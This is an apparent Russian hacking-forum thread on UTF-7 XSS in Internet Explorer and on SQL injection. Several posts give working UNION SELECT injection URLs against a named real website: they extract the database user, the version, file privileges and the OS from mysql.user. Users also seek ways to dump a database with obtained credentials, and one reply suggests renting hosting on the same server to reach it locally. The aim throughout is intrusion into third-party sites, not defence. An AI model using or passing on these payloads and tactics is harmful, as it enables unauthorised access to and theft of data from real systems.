Xss-нападения с использованием кодировки Utf-7. XSS-нападения с использованием кодировки UTF-7. Есть сайт _http://www.softsoft.ru/search/609468/index.htm Там есть форма поиска Смотрим условия: + Работает только с браузером Internet Explorer + Код должен находится до тегов определяющих кодировку + Перед кодом не должно быть никакого текста, содержащего символы из других кодировок Если в тег <title> поместить код в кодировке UTF-7 то браузер раскодирует его и выполнит. То что мы ищем заноситься в тайтл Поэтому по идее достаточно поместить вредоносный код в кодировке UTF-7 в форму поиска На этом сайте фильтруеться строка, если она больше 3 символов, так что возможно не прокатит Но вопросы: 1) Но я и на локалхосте пробую без фильтрации например так Алерта нет... Как именно нужно указать что текст в кодировке UTF-7? Переводил редактором AnyCode, а дальше просто скопировать полученный текст? Или ИЕ уже по другому обрабатыает кодировки? 2) Есль ли такие же способы, но с другими кодировками напр UTF-16 ?
чтобы код выполнялся, нужно поместить МЕТА-тег Помню даж на старом античате статья была... кстати вот она: http://old.antichat.ru/txt/utf7/ прочти и всё поймёшь
Ты бы сам-то прочитал бы эту статью! Где там в примерах помещается МЕТА-тег??? Там просто закрываеться </title> - под видом +ADw-/title+AD4 и вставляеться javascript код
упс)) давно уже её читал, толком не помню, но суть прежняя : без мета тега не прокатит. наверное только в старой ИЕшке.
и у меня возник вопрос, по скулям: есть скуля, но выводятся только цифры, а текст не ввыводится. Что делать? как пример, сайт русских шлюх: http://putana.nu/list.php?link=-1+union+select+user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/*
2 o3,14um нужны текстовые поля, всё выводится: http://putana.nu/list.php?link=-1+union+select+1,user(),version(),4,5,6,7,8,9,10,11,12,13,%2014,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20,31,32,33,34,35,36,37,38,39,40,41,42,43/* PS кстати root
Скуля вообще может претендовать на звание идеальной, не смотря на 4.0 ветку. File_priv = Y, к тому же еще и ось фряшная, значит можно диры просматривать.. развлечение да и только Code: cmd> POST /list.php?link=-1+union+select+1,@@version_compile_os,file_priv,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+mysql.user/* HTTP/1.0
Имею на руках логин, базу данных, пароль от базы данных. Можно ли подсоединиться telnet'om или с помощью ssh к открытому порту 3306 и слить оттуда базу данных?
В том то и дело, что myadmin либо нет, либо спрятан так, что фиг найдешь. Искал его в течении недели. Подключение к удаленному mysql запрещено. Я пытался так сделать. Где можно почитать документацию по коннекту к порту, дампу базы данных и etc? В доках по телнету или ssh ?
Можешь узнать что за хостинг, купить себе хостинг на этом же серваке и подключится к БД локально с логином и паролем от базы того хоста чью базу хочешь слить.
Коннект к порту 3306 будет возможен в том случае если он открыт и если поле host в таблице mysql.user будет % или просто совпадать с твоей маской.
нет, я не имел ввиду конкретный случай! ПРосто допустим, есть ситуация, где выводится 1 поле. Выводятся там только цифры. Есть ли возможность выводить слова, а не заниматься такой вот хернёй: ascii(substring(user(),1,1))
Есть скуля такого типа select `bla1`,`bla2` FROM `tb` where `id` = $_GET['id'] на экран выводится $fetch['bla'] и $fetch['bla2'] как сделать так чтоб выводилось на экран то что я хочу?)) если это вообще возможно union select 1,2 не подходит выводится сёравно только $fetch['bla'] и $fetch['bla2']
ты уверен что там именно 2 колонки берется... подбери еще раз через order+by или через group+by кол-во колонок... и кстати кинь линк - посмотрим что там сделать можно...
Code: mysql> select user, host from mysql.user; +------+-----------+ | user | host | +------+-----------+ | root | 127.0.0.1 | | pun | localhost | | root | 90.90.%.% | +------+-----------+ 3 rows in set И вот если у тебя IP начинается на 90.90. , то если знаешь логин/пасс, можно удалённо подключиться. Ето и есть совпадение маски. Ссылку давай.
mySQL query error: INSERT INTO ibf_pfields_content (field_1,field_2,field_3,field_4,member_id) VALUES('от верблюда-\','l','','',7463) mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'l','','',7463)' at line 1 mySQL error code: Date: Saturday 05th 2008f July 2008 03:39:04 PM подскажите это уязвимость?)))))))прошу не обзываться) вообщем если уязвимость то вызвало её вот это при регистрации в личку могу сказать некоторым где это)